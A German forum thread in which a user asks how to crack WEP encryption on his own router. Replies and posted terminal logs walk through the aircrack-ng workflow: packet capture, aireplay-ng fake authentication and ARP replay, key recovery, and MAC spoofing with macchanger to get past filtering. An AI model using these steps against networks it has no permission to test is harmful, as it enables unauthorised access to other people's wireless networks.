WEP Cracking Frage (Packete)

[-Xeon-]

Hallo... wollte heute mal Probieren unseren Router zu hacken... habe testweise ihn auf wep verschlüsslung umgestellt.
Mit dem Befehl
airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device]
Bringe ich den Router ja dazu mehr Packete zuschicken.
Habe in Tuts gelesen das man so paar tausend packete "sammeln" sollte... was ist denn eig. wenn man die gesammelt hat?
Weil bei den meisten Tuts oder Vids wird man irgendwann gefragt ob man die Packete benutzen will... bei mir sammelt der einfach die ganze zeit packete...
wisst ihr was ich meine?
Vllt könnt ihr mal weiter helfen.

Lg Xeon

[KMDave]

Normalerweise sollten die Tuts dann genau alles beschreiben.

Hast du schonmal in unserer Howto-Sektion geschaut?

[ozzy66]

naja wenn du die richtige packete sammelst dann musst du aircrack-ng starten und den key berechnen zu lassen...

ozzy

[-Xeon-]

ja ich hatte schon in vielen tuts geguckt aber keine antwort gef... meist steht dort einfach nur der Befehl "airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66 [device] " und dann wird auch schon angezeigt ob man die Packete verwenden möchte und bestätigen soll man dann eig. mit "y".
Aber weiter als das er anfängt die gesammelten Packete zu sammeln komme ich nicht... also ich komm nicht zu der Frage ob man die Packete eben verwenden möchte(in der Datei speichern)
In den meisten HowTo's ist es nicht so toll erklärt
z.B. "Nachdem Du ca 10.000 - 20.000 Packete gesammelt hast können wir mit dem entschlüsseln des WEP Schlüssels beginnen..." Steht eben nicht wie man das Packete sammeln beendet... klar ich kann strg+c drücken aber dann speichert er die gesammelte packete ja nicht ab...
link zum tut
hxxp://board.protecus.de/t34622.htm

Wollte mir das Tut angucken (German) Tutorial WEP Crack aus dem
HowTo Bereich allerdings geht der Link irgendwie nicht?!

Lg thx schonmal =)

[reeth]

= )
airodump-ng -w (dateiname später wichtig für aircrack-ng!) -c (channel halt ) -bssid (bssid AP) wlan0 (oder dein Device halt)
aireplay-ng -1 0 -a (bssid AP) wlan0
aireplay-ng -3 -b (bssid AP) -h (deine mac) wlan sofern jemand auf dem AP angemeldet ist und surft dürfte er anfangen zu Zählen

dann einfach aircrack-ng (dateiname von schritt1)

und fertig = )

mfg Reeth

[-Xeon-]

So habe mir jetzt einen usb w-lan stick gekauft mit einem rtl8187 chip... läuft ja out of box...
nun wollte ich es eben probieren am netbook wep zucracken... wird auch alles erkannt etc... nur komme ich bei einem schritt nicht weiter und zwar
"aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e [essid] [device] "
Normal sollte nach einer Zeit association successful erscheinen... allerdings kommt bei mir nur dies:

Code:

 
bt ~ # aireplay-ng -1 0 -e test -a 00:17:9A:66:31:7B -h 00:11:22:33:44:55 wlan0

07:50:40  Waiting for beacon frame (BSSID: 00:17:9A:66:31:7B) on channel 6


07:50:40  Sending Authentication Request (Open System) [ACK]


07:50:42  Sending Authentication Request (Open System) [ACK]


07:50:44  Sending Authentication Request (Open System) [ACK]


07:50:46  Sending Authentication Request (Open System) [ACK]


07:50:48  Sending Authentication Request (Open System)


07:50:50  Sending Authentication Request (Open System) [ACK]


07:50:52  Sending Authentication Request (Open System) [ACK]

Habe auch mal eine andere mac Adresse gefakt mit paar Buchstaben weil ich mir gedacht hab das vllt der Router die mac Adresse blockt...
Jemand eine Idee was ich Falsch mache?
Zur Kontrolle ob ich was vergessen hatte, habe ich das Tut meist benutzt
hxxp://board.protecus.de/t34622.htm
Lg =)

[reeth]

Ja, das sieht ganz nach mac filter aus

macchanger --mac (mac und dann dein Device wlan0 denk ich

[-Xeon-]

hab ja schon mac geändert gehabt... denke mal muss ich mal an einem anderen netz ausprobiere...
hatte irgendwie eine mac adresse von 0C:2F:35:7B usw... desw. denke ich mal entweder mach ich was falsch oder der router lässt komplett keine neue mac adressen zu

[KMDave]

hab ja schon mac geändert gehabt... denke mal muss ich mal an einem anderen netz ausprobiere...
hatte irgendwie eine mac adresse von 0C:2F:35:7B usw... desw. denke ich mal entweder mach ich was falsch oder der router lässt komplett keine neue mac adressen zu

Wieviele Netze hast du denn in deiner Umgebung?

[-Xeon-]

2 Normale, davon 1 mir und das anderen vom Nachbar und dann noch ca. 4 Hidden(hab ich mit der W-Lan Karte gef.) die ich aber mit dem USB Stick nicht mehr gef. habe (glaub reichweite zu klein)

Edit:
Stelle meinen Router mal kurz auf WEP um und teste es dann mal

Edit2:
Das gleiche auch bei meinem Router o.O

Edit3: so hab es mal dokumentiert wie ich es bisher gemacht habe...
Ist es eig. normal das wenn ich ihm sage er soll die packete in der datei "test" speichern, dass er dann mehrere "Test" dateien auf dem desktop speichert? (Test01,Test02...)

Code:

root@xeon-desktop:~# airmon-ng


Interface       Chipset         Driver

ra0             Ralink 2560 PCI rt2500
wlan0           RTL8187         rtl8187 - [phy0]

root@xeon-desktop:~# airmon-ng stop wlan0


Interface       Chipset         Driver

ra0             Ralink 2560 PCI rt2500
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode disabled)

root@xeon-desktop:~# ifconfig wlan0 down
root@xeon-desktop:~# macchanger --mac O2:1F:22:3B:F4:55 wlan0
Current MAC: 00:e0:4c:03:44:e8 (Realtek Semiconductor Corp.)
Faked MAC:   00:1f:22:3b:f4:55 (unknown)
root@xeon-desktop:~# airmon-ng start wlan0


Interface       Chipset         Driver

ra0             Ralink 2560 PCI rt2500
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

root@xeon-desktop:~# airodump-ng mon0

 CH  2 ][ Elapsed: 4 s ][ 2009-07-11 13:34

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:9A:66:31:7B  -74        5        0    0   6  54 . WEP  WEP         test
 00:15:0C:5C:C8:03  -73        6        2    0   8  54e  WPA2 CCMP   PSK  FRITZ

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:15:0C:5C:C8:03  00:19:5B:3C:9E:A8  -30    0 -54e     0        2

root@xeon-desktop:~# airodump-ng -c 6 -w Packete --bssid 00:17:9A:66:31:7B mon0

CH  6 ][ Elapsed: 1 min ][ 2009-07-11 13:39

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:17:9A:66:31:7B  -73  93     1023        0    0   6  54 . WEP  WEP         test

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

 00:17:9A:66:31:7B  00:1F:22:3B:F4:55    0    0 - 1      0       12

root@xeon-desktop:~# aireplay-ng -1 0 -a 00:17:9A:66:31:7B -h 00:1f:22:3b:f4:55 -e test mon0
The interface MAC (00:E0:4C:03:44:E8) doesn't match the specified MAC (-h).
        ifconfig mon0 hw ether 00:1F:22:3B:F4:55
13:37:17  Waiting for beacon frame (BSSID: 00:17:9A:66:31:7B) on channel 6

13:37:17  Sending Authentication Request (Open System) [ACK]

13:37:19  Sending Authentication Request (Open System) [ACK]

13:37:21  Sending Authentication Request (Open System) [ACK]

13:37:23  Sending Authentication Request (Open System) [ACK]

Code:

ra0             Ralink 2560 PCI rt2500
wlan0           RTL8187         rtl8187 - [phy0]
                                (monitor mode enabled on mon0)

Da der monitor mode auf mon0 enabled ist habe ich mir gedacht muss ich als device mon0 nehme und nich wlan0... wenn ich es mit wlan0 mache geht es allerdings auch nicht.